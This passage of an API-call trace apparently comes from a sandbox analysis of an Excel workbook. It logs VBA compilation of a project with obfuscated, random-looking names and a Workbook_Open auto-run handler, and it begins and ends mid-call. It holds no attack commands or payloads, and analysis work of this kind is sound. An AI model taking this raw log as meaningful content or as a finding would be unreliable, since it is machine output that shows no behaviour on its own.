(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="026078a635", cchWideChar=11, lpMultiByteStr=0x1dede0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="026078a635", lpUsedDefaultChar=0x0) returned 11 [0157.467] GetLocalTime (in: lpSystemTime=0x1deec8 | out: lpSystemTime=0x1deec8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2f, wMilliseconds=0x351)) [0157.467] _ultow_s (in: _Value=0x6078a637, _Buffer=0xa14b9b4, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a637") returned 0x0 [0157.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="056078a637", cchWideChar=11, lpMultiByteStr=0x1dee20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="056078a637", lpUsedDefaultChar=0x0) returned 11 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x7ee8480 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x7f5ac70 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x7f5a730 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55130 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c547f0 [0157.468] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa4a70 [0157.469] _mbscpy_s (in: _Dst=0x1de090, _DstSizeInBytes=0x2, _Src=0x5732b8e | out: _Dst=0x1de090) returned 0x0 [0157.470] IMalloc:Free (This=0x7fefecb5380, pv=0x9aa4a70) [0157.470] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa4a70 [0157.470] _mbscpy_s (in: _Dst=0x1de090, _DstSizeInBytes=0x3, _Src=0x63a00f2 | out: _Dst=0x1de090) returned 0x0 [0157.470] _mbscpy_s (in: _Dst=0x1de090, _DstSizeInBytes=0x4, _Src=0x63a0116 | out: _Dst=0x1de090) returned 0x0 [0157.470] IMalloc:Free (This=0x7fefecb5380, pv=0x9aa4a70) [0157.470] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa4a70 [0157.471] _mbscpy_s (in: _Dst=0x1de090, _DstSizeInBytes=0x3, _Src=0x63a0292 | out: _Dst=0x1de090) returned 0x0 [0157.471] IMalloc:Free (This=0x7fefecb5380, pv=0x9aa4a70) [0157.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1dec60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0157.472] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0157.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1de880, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.472] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Workbook", cchWideChar=9, lpMultiByteStr=0x1de880, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workbook", lpUsedDefaultChar=0x0) returned 9 [0157.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b62, cbMultiByte=10, lpWideCharStr=0x1dec00, cchWideChar=20 | out: lpWideCharStr="SZpmrPBsT") returned 10 [0157.484] _mbscpy_s (in: _Dst=0x1dec40, _DstSizeInBytes=0xa, _Src=0x5732b62 | out: _Dst=0x1dec40) returned 0x0 [0157.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c92, cbMultiByte=14, lpWideCharStr=0x1dec00, cchWideChar=28 | out: lpWideCharStr="Workbook_Open") returned 14 [0157.484] _mbscpy_s (in: _Dst=0x1dec40, _DstSizeInBytes=0xe, _Src=0x5732c92 | out: _Dst=0x1dec40) returned 0x0 [0157.484] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.484] _mbscpy_s (in: _Dst=0x1dec40, _DstSizeInBytes=0xe, _Src=0x1dec49 | out: _Dst=0x1dec40) returned 0x0 [0157.484] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x7ee9a70 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x7f5a5b0 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3d0) returned 0xa19a510 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ed270 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x96551b0 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c95f70 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x9bcd5d0 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa267600 [0157.485] IUnknown:AddRef (This=0x9ab5f00) returned 0x3 [0157.485] IUnknown:QueryInterface (in: This=0x9ab5f00, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1deac0 | out: ppvObject=0x1deac0*=0x0) returned 0x80004002 [0157.485] ITypeLib:GetTypeComp (in: This=0x9ab5f00, ppTComp=0x1deab8 | out: ppTComp=0x1deab8*=0x9ab5f10) returned 0x0 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9be59b0 [0157.485] IUnknown:AddRef (This=0x9ab5f10) returned 0x5 [0157.485] IUnknown:Release (This=0x9ab5f10) returned 0x4 [0157.485] IUnknown:Release (This=0x9ab5f00) returned 0x3 [0157.485] IUnknown:AddRef (This=0x9ab4b50) returned 0xf [0157.485] IUnknown:QueryInterface (in: This=0x9ab4b50, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1deac0 | out: ppvObject=0x1deac0*=0x0) returned 0x80004002 [0157.485] ITypeLib:GetTypeComp (in: This=0x9ab4b50, ppTComp=0x1deab8 | out: ppTComp=0x1deab8*=0x9ab4b60) returned 0x0 [0157.485] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9bd1ab0 [0157.485] IUnknown:AddRef (This=0x9ab4b60) returned 0x11 [0157.485] IUnknown:Release (This=0x9ab4b60) returned 0x10 [0157.486] IUnknown:Release (This=0x9ab4b50) returned 0xf [0157.486] IUnknown:AddRef (This=0x9ab64a0) returned 0x4 [0157.486] IUnknown:QueryInterface (in: This=0x9ab64a0, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1deac0 | out: ppvObject=0x1deac0*=0x0) returned 0x80004002 [0157.486] ITypeLib:GetTypeComp (in: This=0x9ab64a0, ppTComp=0x1deab8 | out: ppTComp=0x1deab8*=0x9ab64b0) returned 0x0 [0157.486] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9bdb4f0 [0157.486] IUnknown:AddRef (This=0x9ab64b0) returned 0x6 [0157.486] IUnknown:Release (This=0x9ab64b0) returned 0x5 [0157.486] IUnknown:Release (This=0x9ab64a0) returned 0x4 [0157.486] IUnknown:AddRef (This=0x9ab6a40) returned 0x2 [0157.486] IUnknown:QueryInterface (in: This=0x9ab6a40, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1deac0 | out: ppvObject=0x1deac0*=0x0) returned 0x80004002 [0157.486] ITypeLib:GetTypeComp (in: This=0x9ab6a40, ppTComp=0x1deab8 | out: ppTComp=0x1deab8*=0x9ab6a50) returned 0x0 [0157.486] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9be5b70 [0157.486] IUnknown:AddRef (This=0x9ab6a50) returned 0x4 [0157.486] IUnknown:Release (This=0x9ab6a50) returned 0x3 [0157.486] IUnknown:Release (This=0x9ab6a40) returned 0x2 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9bd1db0 [0157.487] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7ee9a70, cb=0x90) returned 0x7f91150 [0157.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731556, cbMultiByte=5, lpWideCharStr=0x1de950, cchWideChar=6 | out: lpWideCharStr="Open") returned 5 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x640) returned 0xa169d70 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ecca0 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa267610 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa267620 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0xa1ecd90 [0157.487] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x7ee9a70 [0157.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e96, cbMultiByte=12, lpWideCharStr=0x1dec00, cchWideChar=24 | out: lpWideCharStr="xoAOvMNPSVo") returned 12 [0157.488] _mbscpy_s (in: _Dst=0x1dec40, _DstSizeInBytes=0xc, _Src=0x5732e96 | out: _Dst=0x1dec40) returned 0x0 [0157.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f0a, cbMultiByte=12, lpWideCharStr=0x1dec00, cchWideChar=24 | out: lpWideCharStr="hMqirSfTAmm") returned 12 [0157.488] _mbscpy_s (in: _Dst=0x1dec40, _DstSizeInBytes=0xc, _Src=0x5732f0a | out: _Dst=0x1dec40) returned 0x0 [0157.489] CoCreateGuid (in: pguid=0x1dee00 | out: pguid=0x1dee00*(Data1=0xf37a7fa0, Data2=0xcbc, Data3=0x4434, Data4=([0]=0x8c, [1]=0x6e, [2]=0xb4, [3]=0x68, [4]=0x30, [5]=0xa0, [6]=0x62, [7]=0xdc))) returned 0x0 [0157.489] CoCreateGuid (in: pguid=0x1dee00 | out: pguid=0x1dee00*(Data1=0xf13cc4e3, Data2=0x733c, Data3=0x4ae5, Data4=([0]=0x8a, [1]=0x8d, [2]=0x90, [3]=0x84, [4]=0x6f, [5]=0xa1, [6]=0xd4, [7]=0xa2))) returned 0x0 [0157.489] IMalloc:Alloc (This=0x7fefecb5380, cb=0x14) returned 0x9654ed0 [0157.489] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x95a33f0 [0157.489] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0157.489] IUnknown:AddRef (This=0x9ab5f00) returned 0x4 [0157.489] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1de468, pDummy=0x0 | out: ppTLibAttr=0x1de468, pDummy=0x0) returned 0x0 [0157.489] ITypeLib:RemoteGetDocumentation (in: This=0x9ab5f00, index=-1, refPtrFlags=0x1de480, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1de4a0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1de4a0*=0x0) returned 0x0 [0157.489] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e00e0 [0157.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x1de4f0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL«\x09", lpUsedDefaultChar=0x0) returned 66 [0157.489] strcpy_s (in: _Dst=0x9808b10, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0157.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x1de600, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0157.489] strcpy_s (in: _Dst=0x9808b60, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0157.489] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e0530 [0157.490] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.490] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.490] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.490] _wcsicmp (_String1="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 4 [0157.490] _wcsicmp (_String1="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", _String2="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 0 [0157.490] IUnknown:AddRef (This=0x9ab4b50) returned 0x11 [0157.490] ITypeLib:RemoteGetLibAttr (in: This=0x9ab4b50, ppTLibAttr=0x1de468, pDummy=0x0 | out: ppTLibAttr=0x1de468, pDummy=0x0) returned 0x0 [0157.490] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x1de480, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0157.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", cchWideChar=57, lpMultiByteStr=0x1de4f0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 57 [0157.490] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c54a40 [0157.490] strcpy_s (in: _Dst=0x9c54a68, _DstSize=0x3a, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE") returned 0x0 [0157.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Excel", cchWideChar=6, lpMultiByteStr=0x1de600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel", lpUsedDefaultChar=0x0) returned 6 [0157.490] strcpy_s (in: _Dst=0x9c54ab0, _DstSize=0x6, _Src="Excel" | out: _Dst="Excel") returned 0x0 [0157.490] IUnknown:AddRef (This=0x9ab4b50) returned 0x12 [0157.490] ITypeLib:LocalReleaseTLibAttr (This=0x9ab4b50) returned 0x0 [0157.490] IUnknown:Release (This=0x9ab4b50) returned 0x11 [0157.491] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0157.491] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned -4 [0157.491] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0157.491] IUnknown:AddRef (This=0x9ab64a0) returned 0x5 [0157.491] ITypeLib:RemoteGetLibAttr (in: This=0x9ab64a0, ppTLibAttr=0x1de468, pDummy=0x0 | out: ppTLibAttr=0x1de468, pDummy=0x0) returned 0x0 [0157.491] ITypeLib:RemoteGetDocumentation (in: This=0x9ab64a0, index=-1, refPtrFlags=0x1de480, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0157.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x1de4f0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\EXCEL.EXE", lpUsedDefaultChar=0x0) returned 31 [0157.491] strcpy_s (in: _Dst=0x9c54b20, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0157.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1de600, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0157.491] strcpy_s (in: _Dst=0x9c54b48, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0157.492] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.493] ITypeLib:LocalReleaseTLibAttr (This=0x9ab64a0) returned 0x0 [0157.493] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.493] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0157.493] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 2 [0157.493] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0157.494] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0157.494] IUnknown:AddRef (This=0x9ab6a40) returned 0x3 [0157.494] ITypeLib:RemoteGetLibAttr (in: This=0x9ab6a40, ppTLibAttr=0x1de468, pDummy=0x0 | out: ppTLibAttr=0x1de468, pDummy=0x0) returned 0x0 [0157.494] ITypeLib:RemoteGetDocumentation (in: This=0x9ab6a40, index=-1, refPtrFlags=0x1de480, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0157.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x1de4f0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0157.494] strcpy_s (in: _Dst=0x9c54bb8, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0157.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1de600, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0157.494] strcpy_s (in: _Dst=0x9c54c00, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0157.494] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.494] ITypeLib:LocalReleaseTLibAttr (This=0x9ab6a40) returned 0x0 [0157.494] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.494] IMalloc:Free (This=0x7fefecb5380, pv=0xa1ed5d0) [0157.495] IMalloc:Alloc (This=0x7fefecb5380, cb=0x118) returned 0x9c31810 [0157.495] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c54c90 [0157.495] IMalloc:Alloc (This=0x7fefecb5380, cb=0x910) returned 0xa266640 [0157.499] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9be5af0 [0157.499] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9be5ab0 [0157.500] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9be5a70 [0157.500] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9be5a30 [0157.500] strcpy_s (in: _Dst=0x9c54d18, _DstSize=0x9, _Src="Workbook" | out: _Dst="Workbook") returned 0x0 [0157.500] IMalloc:Alloc (This=0x7fefecb5380, cb=0x218) returned 0x98a6500 [0157.500] ITypeLib:RemoteGetLibAttr (in: This=0x9ab4b50, ppTLibAttr=0x1dd5d8, pDummy=0x0 | out: ppTLibAttr=0x1dd5d8, pDummy=0x0) returned 0x0 [0157.500] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x1dd5f0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0157.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", cchWideChar=57, lpMultiByteStr=0x1dd660, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE", lpUsedDefaultChar=0x0) returned 57 [0157.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Excel", cchWideChar=6, lpMultiByteStr=0x1dd770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel", lpUsedDefaultChar=0x0) returned 6 [0157.500] ITypeLib:LocalReleaseTLibAttr (This=0x9ab4b50) returned 0x0 [0157.500] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e0980 [0157.500] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c555d0 [0157.500] IUnknown:Release (This=0x9ab4b50) returned 0x12 [0157.501] _mbscpy_s (in: _Dst=0x1dd510, _DstSizeInBytes=0xa, _Src=0x5732b62 | out: _Dst=0x1dd510) returned 0x0 [0157.501] IMalloc:Alloc (This=0x7fefecb5380, cb=0x60) returned 0xa12b200 [0157.501] strcpy_s (in: _Dst=0x9c54d30, _DstSize=0xa, _Src="SZpmrPBsT" | out: _Dst="SZpmrPBsT") returned 0x0 [0157.501] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99e0dd0 [0157.501] strcpy_s (in: _Dst=0x980aac8, _DstSize=0x2, _Src="h" | out: _Dst="h") returned 0x0 [0157.501] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.501] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.501] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.501] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.501] GetCurrentProcess () returned 0xffffffffffffffff [0157.501] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x55) returned 1 [0157.501] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.501] _mbscpy_s (in: _Dst=0x1dd510, _DstSizeInBytes=0xe, _Src=0x5732c92 | out: _Dst=0x1dd510) returned 0x0 [0157.501] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.501] _mbscpy_s (in: _Dst=0x1dd510, _DstSizeInBytes=0xe, _Src=0x1dd519 | out: _Dst=0x1dd510) returned 0x0 [0157.501] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0157.502] _mbscpy_s (in: _Dst=0x1dd4d0, _DstSizeInBytes=0xe, _Src=0x5732c92 | out: _Dst=0x1dd4d0) returned 0x0 [0157.502] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook") returned 0x10186b [0157.502] _mbscpy_s (in: _Dst=0x1dd4d0, _DstSizeInBytes=0xe, _Src=0x1dd4d9 | out: _Dst=0x1dd4d0) returned 0x0 [0157.502] IMalloc:Alloc (This=0x7fefecb5380, cb=0x48) returned 0x97c9cd0 [0157.502] strcpy_s (in: _Dst=0x9c54d48, _DstSize=0xe, _Src="Workbook_Open" | out: _Dst="Workbook_Open") returned 0x0 [0157.502] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55380 [0157.502] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.502] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.502] GetCurrentProcess () returned 0xffffffffffffffff [0157.502] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x45) returned 1 [0157.502] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.502] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x9be59f0 [0157.502] IMalloc:Alloc 